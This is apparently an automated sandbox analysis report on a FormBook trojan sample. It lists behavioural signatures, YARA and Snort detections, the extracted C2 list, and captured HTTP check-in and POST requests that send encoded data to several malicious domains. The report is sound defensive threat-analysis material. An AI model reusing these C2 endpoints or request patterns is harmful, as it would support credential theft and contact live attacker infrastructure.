Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lc8xQv8iZY.exe

Overview

General Information

Sample Name:Lc8xQv8iZY.exe
Analysis ID:756323
MD5:30571d64c9a9ed267159fa941a20840c
SHA1:bfb81d8a7c94781b3bd939bd17d500ae61b2ff70
SHA256:85d6c9eac93fb8818d37dc15110ebd060b3e9df48043ee6bcf349df6aed047c5
Tags:32exeFormbooktrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • Lc8xQv8iZY.exe (PID: 3376 cmdline: C:\Users\user\Desktop\Lc8xQv8iZY.exe MD5: 30571D64C9A9ED267159FA941A20840C)
    • hvbvmxm.exe (PID: 3052 cmdline: "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h MD5: 1EEBBBD92B2C0C60F896FF8DCBCEDCAA)
      • conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • hvbvmxm.exe (PID: 5420 cmdline: "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h MD5: 1EEBBBD92B2C0C60F896FF8DCBCEDCAA)
        • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • help.exe (PID: 1900 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup
{"C2 list": ["www.brennancorps.info/henz/"]}
SourceRuleDescriptionAuthorStrings
00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6611:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f070:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17df7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x17bf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x176a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17cf7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa48a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1a0e9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac61:$sqlite3step: 68 34 1C 7B E1
    • 0x1a12b:$sqlite3text: 68 38 2A 90 C5
    • 0x1aca6:$sqlite3text: 68 38 2A 90 C5
    • 0x1a142:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 29 entries
      SourceRuleDescriptionAuthorStrings
      3.2.hvbvmxm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.hvbvmxm.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6f48:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1f9a7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xb1f6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1872e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.hvbvmxm.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x1852c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x17fd8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1862e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x187a6:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xadc1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17223:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1e71e:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1f711:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.hvbvmxm.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x1aa20:$sqlite3step: 68 34 1C 7B E1
        • 0x1b598:$sqlite3step: 68 34 1C 7B E1
        • 0x1aa62:$sqlite3text: 68 38 2A 90 C5
        • 0x1b5dd:$sqlite3text: 68 38 2A 90 C5
        • 0x1aa79:$sqlite3blob: 68 53 D8 7F 8C
        • 0x1b5f3:$sqlite3blob: 68 53 D8 7F 8C
        3.2.hvbvmxm.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 3 entries
          No Sigma rule has matched
          Timestamp:192.168.2.4162.214.129.14949699802031453 11/30/22-01:25:33.429382
          SID:2031453
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4162.214.129.14949699802031412 11/30/22-01:25:33.429382
          SID:2031412
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4206.233.197.13549697802031453 11/30/22-01:25:25.388400
          SID:2031453
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4206.233.197.13549697802031412 11/30/22-01:25:25.388400
          SID:2031412
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4162.214.129.14949699802031449 11/30/22-01:25:33.429382
          SID:2031449
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4206.233.197.13549697802031449 11/30/22-01:25:25.388400
          SID:2031449
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Lc8xQv8iZY.exeReversingLabs: Detection: 48%
          Source: Lc8xQv8iZY.exeVirustotal: Detection: 47%Perma Link
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.lopezmodeling.com/henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Source: http://www.eufidelizo.com/henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Source: http://www.brennancorps.info/henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Source: http://www.lopezmodeling.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.brennancorps.info/henz/Avira URL Cloud: Label: malware
          Source: www.brennancorps.info/henz/Avira URL Cloud: Label: malware
          Source: http://www.lyonfinancialusa.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.afterdarksocial.club/henz/Avira URL Cloud: Label: malware
          Source: http://www.foxwhistle.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Source: eufidelizo.comVirustotal: Detection: 8%Perma Link
          Source: www.eufidelizo.comVirustotal: Detection: 6%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeReversingLabs: Detection: 53%
          Source: Lc8xQv8iZY.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeJoe Sandbox ML: detected
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.brennancorps.info/henz/"]}
          Source: Lc8xQv8iZY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: hvbvmxm.exe, 00000001.00000003.304073189.0000000002740000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000001.00000003.303031511.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: hvbvmxm.exe, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00410370 FindFirstFileExW,

          Networking

          barindex
          Source: C:\Windows\explorer.exeDomain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exeNetwork Connect: 155.159.61.221 80
          Source: C:\Windows\explorer.exeDomain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.35.86 80
          Source: C:\Windows\explorer.exeDomain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exeDomain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exeDomain query: www.lopezmodeling.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.217.47 80
          Source: C:\Windows\explorer.exeNetwork Connect: 206.233.197.135 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.22.100.62 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.214.129.149 80
          Source: C:\Windows\explorer.exeDomain query: www.foxwhistle.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
          Source: C:\Windows\explorer.exeDomain query: www.brennancorps.info
          Source: C:\Windows\explorer.exeDomain query: www.19t221013d.tokyo
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
          Source: Malware configuration extractorURLs: www.brennancorps.info/henz/
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1Host: www.brennancorps.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1Host: www.lopezmodeling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1Host: www.foxwhistle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.185.217.47 192.185.217.47
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 4b 4d 30 4f 32 5f 38 30 57 4c 61 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.afterdarksocial.clubConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.afterdarksocial.clubUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.afterdarksocial.club/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 78 52 42 4e 59 66 6f 55 79 47 73 48 35 70 57 58 50 6b 34 67 55 52 30 62 31 78 47 6c 43 71 63 4a 6e 59 6f 75 65 4c 76 44 52 72 55 33 4c 74 52 78 78 42 4f 4b 54 58 37 56 68 44 53 6c 43 70 65 6a 56 38 35 48 73 5a 4b 50 31 65 30 39 69 47 6e 2d 6f 31 4c 7a 5a 54 4e 45 43 76 72 32 5a 51 63 57 66 59 35 34 36 45 77 73 4f 4d 41 54 43 73 4d 74 53 42 49 37 47 4f 4a 51 66 32 30 47 45 70 37 30 66 39 31 5f 75 6d 4e 79 4e 75 31 32 74 77 56 64 37 5a 42 4f 4f 71 62 36 35 79 43 5f 53 4c 32 6a 4d 79 37 32 35 65 52 55 37 4f 77 73 68 47 53 56 63 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jMy725eRU7OwshGSVcA).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.patrickguarte.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.patrickguarte.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.patrickguarte.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 30 72 56 75 73 4f 28 4a 6e 64 6d 42 33 79 67 33 33 31 6c 64 33 47 58 57 33 64 4a 4e 62 61 42 51 37 6e 44 43 46 6b 6d 33 43 67 48 48 37 53 4d 36 72 76 75 47 67 41 5a 47 68 32 57 50 62 49 58 34 56 56 72 4b 4f 62 34 41 51 6f 41 65 31 38 75 43 6e 67 55 4a 57 52 4a 34 28 75 4d 75 76 4c 64 48 79 56 4a 38 50 6c 4b 54 30 4b 6c 59 70 47 46 38 6c 5f 30 42 45 76 4e 37 78 77 7a 4c 6c 5f 4f 6b 72 45 32 69 66 6e 64 45 6b 6c 55 52 5a 57 34 74 65 6b 4e 33 67 53 6d 47 61 63 31 43 47 36 33 69 6e 33 53 33 41 36 71 70 49 52 49 44 4e 46 7e 47 49 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63in3S3A6qpIRIDNF~GIA).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.brennancorps.infoConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.brennancorps.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brennancorps.info/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 43 36 36 7a 31 2d 46 33 50 30 6d 6f 65 62 4e 7a 7e 51 71 50 73 58 72 32 61 6b 65 42 31 62 43 41 6e 53 55 34 33 45 57 56 36 47 38 51 75 69 53 77 4b 78 55 5a 6d 32 77 6a 55 6a 77 6b 7a 66 75 54 6e 37 57 47 44 32 64 6d 59 52 64 38 52 4a 6a 62 62 50 55 4e 6b 69 49 58 75 42 41 6c 68 39 74 51 6c 72 42 51 56 52 4c 62 6e 50 6f 79 46 49 65 43 56 69 73 32 79 4d 59 73 55 32 49 66 73 4b 69 4b 66 63 31 64 35 65 4e 5f 61 39 53 2d 44 4c 72 4a 54 30 77 6f 41 6a 42 53 51 4a 37 68 6c 41 56 34 61 4f 37 69 65 4e 44 32 59 71 6a 41 33 6d 47 31 67 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=C66z1-F3P0moebNz~QqPsXr2akeB1bCAnSU43EWV6G8QuiSwKxUZm2wjUjwkzfuTn7WGD2dmYRd8RJjbbPUNkiIXuBAlh9tQlrBQVRLbnPoyFIeCVis2yMYsU2IfsKiKfc1d5eN_a9S-DLrJT0woAjBSQJ7hlAV4aO7ieND2YqjA3mG1gw).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lopezmodeling.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lopezmodeling.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lopezmodeling.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 51 72 76 61 43 39 61 69 56 32 4d 36 28 65 75 56 73 50 58 43 4c 75 38 51 48 75 32 52 48 34 28 72 32 39 32 74 4c 61 4b 33 32 77 6c 51 64 76 38 44 4f 6c 41 63 6c 6a 36 4d 38 45 6c 32 6a 75 71 59 6d 43 45 51 35 74 45 6a 39 53 49 6a 68 57 4f 46 43 30 54 36 70 68 55 78 63 59 75 64 78 2d 39 56 7e 4f 44 72 35 53 4e 52 6c 67 65 7a 51 66 28 65 6e 68 7a 75 54 34 42 5a 73 30 49 31 37 7a 73 43 70 68 6b 45 74 7a 70 4b 31 36 71 54 41 37 61 6e 31 6e 74 55 54 6d 6b 34 54 37 72 41 41 35 35 4b 6b 45 78 45 73 59 4d 6e 64 7a 51 78 7a 44 7e 4f 52 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=QrvaC9aiV2M6(euVsPXCLu8QHu2RH4(r292tLaK32wlQdv8DOlAclj6M8El2juqYmCEQ5tEj9SIjhWOFC0T6phUxcYudx-9V~ODr5SNRlgezQf(enhzuT4BZs0I17zsCphkEtzpK16qTA7an1ntUTmk4T7rAA55KkExEsYMndzQxzD~ORw).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.foxwhistle.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.foxwhistle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.foxwhistle.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 75 4b 4a 33 71 67 6f 51 6a 53 53 49 6c 37 32 53 57 52 62 78 6d 4a 66 79 62 2d 43 48 5a 61 64 44 71 46 6a 78 48 58 77 39 33 69 43 66 6a 62 65 45 52 54 39 32 4c 59 53 45 33 41 4d 38 63 33 61 5a 67 38 43 4b 6d 47 6a 6a 44 46 31 39 43 71 33 69 35 31 36 62 34 4c 61 63 41 5a 4c 31 77 7a 45 78 77 70 79 56 48 52 6b 62 4f 53 7e 71 41 33 58 61 4a 37 6b 37 62 74 6d 45 4b 38 6e 45 35 33 74 6f 56 37 6c 56 72 36 50 49 42 54 57 77 58 39 76 46 62 47 67 4c 7e 48 70 47 45 74 4f 2d 73 72 33 35 7e 37 51 67 4b 64 72 48 41 74 48 34 6c 47 7e 42 57 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=uKJ3qgoQjSSIl72SWRbxmJfyb-CHZadDqFjxHXw93iCfjbeERT92LYSE3AM8c3aZg8CKmGjjDF19Cq3i516b4LacAZL1wzExwpyVHRkbOS~qA3XaJ7k7btmEK8nE53toV7lVr6PIBTWwX9vFbGgL~HpGEtO-sr35~7QgKdrHAtH4lG~BWg).
